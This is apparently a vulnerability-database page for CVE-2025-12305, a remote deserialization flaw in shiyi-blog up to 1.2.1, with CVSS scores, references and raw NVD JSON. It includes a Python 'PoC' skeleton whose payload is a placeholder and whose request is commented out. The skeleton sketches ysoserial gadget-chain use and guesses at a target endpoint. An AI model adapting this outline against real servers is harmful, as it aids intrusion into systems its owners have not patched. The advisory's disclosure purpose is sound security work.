CVE-2025-12305

Description

A vulnerability was found in quequnlong shiyi-blog up to 1.2.1. This impacts an unknown function of the file src/main/java/com/mojian/controller/SysJobController.java of the component Job Handler. The manipulation results in deserialization. The attack can be executed remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:quequnlong:shiyi-blog:*:*:*:*:*:*:*:* - VULNERABLE

shiyi-blog <= 1.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import base64
import requests

# CVE-2025-12305 PoC - shiyi-blog Deserialization RCE
# This is a conceptual PoC for educational purposes only

# Note: Actual exploitation requires identifying the specific gadget chain
# and the vulnerable deserialization point in SysJobController.java

def generate_malicious_payload(gadget_chain='commons-collections'):
    """
    Generate malicious serialized payload using ysoserial concept
    gadget_chain: commons-collections, spring-aop, etc.
    """
    # In real scenario, use ysoserial tool:
    # java -jar ysoserial.jar [gadget-chain] 'command'
    # Example: java -jar ysoserial.jar CommonsCollections6 'touch /tmp/pwned'
    
    # This is a placeholder - actual payload generation requires:
    # 1. ysoserial tool
    # 2. Identification of available gadget chains in the application
    # 3. Specific target endpoint in SysJobController
    
    # Example command to generate payload:
    # payload = subprocess.check_output([
    #     'java', '-jar', 'ysoserial.jar', gadget_chain, 'whoami'
    # ])
    
    return b'MALICIOUS_SERIALIZED_DATA_PLACEHOLDER'

def exploit_target(target_url, payload):
    """
    Send malicious payload to vulnerable endpoint
    """
    # Target endpoint typically in Job Handler:
    # /api/job/execute or similar endpoint in SysJobController
    
    headers = {
        'Content-Type': 'application/x-java-serialized-object',
        'User-Agent': 'Mozilla/5.0'
    }
    
    try:
        # Example POST request to trigger deserialization
        # response = requests.post(
        #     f'{target_url}/api/sysjob/execute',
        #     data=payload,
        #     headers=headers,
        #     timeout=10
        # )
        pass
    except requests.exceptions.RequestException as e:
        print(f'Request failed: {e}')

if __name__ == '__main__':
    # Usage example:
    # target = 'http://vulnerable-server:8080'
    # payload = generate_malicious_payload('commons-collections6')
    # exploit_target(target, payload)
    print('PoC for CVE-2025-12305 - shiyi-blog Deserialization RCE')
    print('Use ysoserial to generate actual payload')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12305
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12305
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12305/
[4] VulDB https://vuldb.com/cve/CVE-2025-12305
[5] https://github.com/dongodid/cve-sub/blob/main/shiyi-blog/RCE.md
[6] https://vuldb.com/?ctiid.329977
[7] https://vuldb.com/?id.329977
[8] https://vuldb.com/?submit.676725
[9] https://vuldb.com/?submit.676730

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12305", "sourceIdentifier": "[email protected]", "published": "2025-10-27T19:16:01.790", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in quequnlong shiyi-blog up to 1.2.1. This impacts an unknown function of the file src/main/java/com/mojian/controller/SysJobController.java of the component Job Handler. The manipulation results in deserialization. The attack can be executed remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-502"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quequnlong:shiyi-blog:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.2.1", "matchCriteriaId": "CFC83719-EDCB-49AF-B0BA-A5E649A808F4"}]}]}], "references": [{"url": "https://github.com/dongodid/cve-sub/blob/main/shiyi-blog/RCE.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329977", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329977", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676725", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.676730", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}